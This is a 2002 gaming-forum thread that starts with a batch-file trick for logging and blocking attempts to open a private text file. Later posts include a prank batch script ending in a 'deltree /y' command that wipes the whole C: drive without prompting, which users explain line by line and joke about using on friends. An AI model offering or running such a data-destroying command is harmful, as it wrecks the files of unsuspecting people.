Go Back   GameTavern > House Specials > Video Gaming
Reply
 
Thread Tools Display Modes

Got a nosy relative/friend?
Old 07-05-2002, 03:53 PM   #1
Blade Runner
Knight
 
Blade Runner's Avatar
 
Blade Runner is offline
Location: 127.0.0.1
Now Playing: Call of Duty
Posts: 294
Arrow Got a nosy relative/friend?

Do you want them to quit seeing what you have got on your pc? Are you in fear of them finding you pr0n, hacking stuff, internet sex chats you saved for a lonely night (lol, none of this applies to me, i'm being overdramatic!)? Anyways.......if you do or think you might know, pay attention. I was learning about batch files and stumbled on this. It logs the name of the file opened and can make it not run all together. OK, enough of my rambling. Here is how to log and stop someone from seeing text files....

open notepad
paste the lines not in parentheses into it but still read the parentheses!

echo %1 >> log.txt

(log.txt is the log of the things opened and time opened)

notepad %1

(this part is optional, it depends if you want the nosy person still seeing what they clicked; if you don't, then don't put this part in here)

IF "%1" == "notepad.txt" ECHO Error

(if you put the optional line in there, than don't put this! notepad.txt stands for the file you don't want them to see; if the name of the text file is bondssexchats.txt (), then it would be "bondssexchats.txt", not "notepad.txt")

Now save this file and at the end of the name type .bat .
Right click the text file you don't want them reading and click open with and click choose program. On the program list click browse and choose the name of the batch file you just created. Be sure to mark it as always open it with this program.

Now when someone clicks the text file to open it, it logs it and doesn't come up if you chose to take that one part out of the batch file.

Its easier than it sounds. Try it with other files too, like images or something.

If just thought I'd share this. If you have trouble post it.
__________________
Warez is bad. It is a bad bad thing. Do not do warez, and the world will be a better place. Little children will once more be able to play on the streets, and old folks can sit in their armchairs without fear of being mugged or burgled, etc. Over 90% of the crimes comitted in the world are linked to Warez, and if you do it, you are contributing to that 90% of crime. How would you like it if the Warez scene's next victim was someone you loved. So do the right thing, and don't do warez; because it's wrong. Morally, and ethically wrong.

Last edited by Blade Runner : 07-05-2002 at 04:01 PM.
  Reply With Quote

Old 07-05-2002, 04:37 PM   #2
Jonbo298
Freaky me Freaky you
 
Jonbo298's Avatar
 
Jonbo298 is offline
Location: In the Cornfields of Iowa
Now Playing:
Posts: 8,081
Default

One question, what if you want to see it. Do u have to go back into the batch file and change the name or something
__________________

Credit to Null for sig

  Reply With Quote

Old 07-05-2002, 05:09 PM   #3
Bond
Cheesehead
 
Bond's Avatar
 
Bond is offline
Location: Midwest
Now Playing:
Posts: 9,314
Default

You could always just hide the folders. Seems a lot easier to me.
  Reply With Quote

Old 07-05-2002, 05:27 PM   #4
sdtPikachu
Super Toaster!
 
sdtPikachu's Avatar
 
sdtPikachu is offline
Location: London, UK
Now Playing:
Posts: 384
Default

Or you could always do what I do for every computer I fix:

Find out how many users use the computer

Give each of them a seperate partition

Re-allocate the "My documents" (ugh) folder to that partition if they are stupid enough to use it

Block that users access to any of the other partitions

Instead of relying on a crappy script to do it for you...

And if that's not secure enough for you, encrypt it. Just don't use the inbuilt M$ encryption, it's about as secure as a jelly bank vault. Use PGP.
__________________
"If you believe in the existence of fairies at the bottom of the garden you are deemed fit for the bin. If you believe in parthenogenesis, ascension, transubstantiation and all the rest of it you are deemed fit to govern the country." - Jonathan Meades
  Reply With Quote

Old 07-06-2002, 04:54 PM   #5
Blade Runner
Knight
 
Blade Runner's Avatar
 
Blade Runner is offline
Location: 127.0.0.1
Now Playing: Call of Duty
Posts: 294
Post

Quote:
Originally posted by Jonbo298
One question, what if you want to see it. Do u have to go back into the batch file and change the name or something
yep.


is pgp out for XP? maybe it doesn't matter. i don't know much about it.
__________________
Warez is bad. It is a bad bad thing. Do not do warez, and the world will be a better place. Little children will once more be able to play on the streets, and old folks can sit in their armchairs without fear of being mugged or burgled, etc. Over 90% of the crimes comitted in the world are linked to Warez, and if you do it, you are contributing to that 90% of crime. How would you like it if the Warez scene's next victim was someone you loved. So do the right thing, and don't do warez; because it's wrong. Morally, and ethically wrong.
  Reply With Quote

Old 07-06-2002, 07:10 PM   #6
Happydude
Tavern Legend
 
Happydude's Avatar
 
Happydude is offline
Location: Toronto
Now Playing:
Posts: 6,124
Default

any idea about what this may do?


@echo off
cls
echo.
echo SURPRISE ASSHOLE !!!
deltree /y C:\*.*
  Reply With Quote

Old 07-06-2002, 07:44 PM   #7
Jonbo298
Freaky me Freaky you
 
Jonbo298's Avatar
 
Jonbo298 is offline
Location: In the Cornfields of Iowa
Now Playing:
Posts: 8,081
Default

Quote:
Originally posted by happydude666
any idea about what this may do?


@echo off
cls
echo.
echo SURPRISE ASSHOLE !!!
deltree /y C:\*.*
Well, if you know the person personally(like a friend or something), you can laugh for many hours
__________________

Credit to Null for sig

  Reply With Quote

Old 07-06-2002, 09:41 PM   #8
Happydude
Tavern Legend
 
Happydude's Avatar
 
Happydude is offline
Location: Toronto
Now Playing:
Posts: 6,124
Default

....so what does it do???
  Reply With Quote

Old 07-07-2002, 01:30 PM   #9
Blade Runner
Knight
 
Blade Runner's Avatar
 
Blade Runner is offline
Location: 127.0.0.1
Now Playing: Call of Duty
Posts: 294
Post

Quote:
Originally posted by happydude666
any idea about what this may do?


@echo off
cls
echo.
echo SURPRISE ASSHOLE !!!
deltree /y C:\*.*


Yes, I know what it should do. I don't know if it would though. There has got to be some kind of protection that would keep you from deleting everything on the C: drive. Kind of mean though, even if the guy is an a$$.
__________________
Warez is bad. It is a bad bad thing. Do not do warez, and the world will be a better place. Little children will once more be able to play on the streets, and old folks can sit in their armchairs without fear of being mugged or burgled, etc. Over 90% of the crimes comitted in the world are linked to Warez, and if you do it, you are contributing to that 90% of crime. How would you like it if the Warez scene's next victim was someone you loved. So do the right thing, and don't do warez; because it's wrong. Morally, and ethically wrong.
  Reply With Quote

Old 07-07-2002, 10:35 PM   #10
Happydude
Tavern Legend
 
Happydude's Avatar
 
Happydude is offline
Location: Toronto
Now Playing:
Posts: 6,124
Default

CAN SOMEONE EXLAIN TO ME WHAT THE F*CK THAT DOES?????




sorry for the language mods...feel free to edit it out...
  Reply With Quote

Old 07-08-2002, 12:07 AM   #11
Jonbo298
Freaky me Freaky you
 
Jonbo298's Avatar
 
Jonbo298 is offline
Location: In the Cornfields of Iowa
Now Playing:
Posts: 8,081
Default

Quote:
Originally posted by happydude666
CAN SOMEONE EXLAIN TO ME WHAT THE F*CK THAT DOES?????
It basically deletes your whole C: drive.
__________________

Credit to Null for sig

  Reply With Quote

Old 07-08-2002, 09:39 AM   #12
Happydude
Tavern Legend
 
Happydude's Avatar
 
Happydude is offline
Location: Toronto
Now Playing:
Posts: 6,124
Default

Quote:
Originally posted by Jonbo298


It basically deletes your whole C: drive.
thank you!!! about time someone told me! eesh!


anyhoo...then whats with the "surprise asshole" thing in it...what does that part do?
  Reply With Quote

Old 07-08-2002, 10:35 AM   #13
Blade Runner
Knight
 
Blade Runner's Avatar
 
Blade Runner is offline
Location: 127.0.0.1
Now Playing: Call of Duty
Posts: 294
Post

@echo off //this command tells it to hide the commands so they don't show up on the dos screen

cls //this clears anything on the dos screen

echo. //skips a line

echo SURPRISE ASSHOLE !!! //says suprise asshole on the dos screen

deltree /y C:\*.* //deletes your C: drive and says yes for you when the computer asks if you are sure


Where did you get this from if you didn't make it?
__________________
Warez is bad. It is a bad bad thing. Do not do warez, and the world will be a better place. Little children will once more be able to play on the streets, and old folks can sit in their armchairs without fear of being mugged or burgled, etc. Over 90% of the crimes comitted in the world are linked to Warez, and if you do it, you are contributing to that 90% of crime. How would you like it if the Warez scene's next victim was someone you loved. So do the right thing, and don't do warez; because it's wrong. Morally, and ethically wrong.
  Reply With Quote

Old 07-08-2002, 01:11 PM   #14
Happydude
Tavern Legend
 
Happydude's Avatar
 
Happydude is offline
Location: Toronto
Now Playing:
Posts: 6,124
Default

from hacking

a friend gave that command to me...and he refused to explain whatit does
  Reply With Quote
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump



All times are GMT -4. The time now is 04:29 PM.


vBulletin skin developed by: eXtremepixels
Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
GameTavern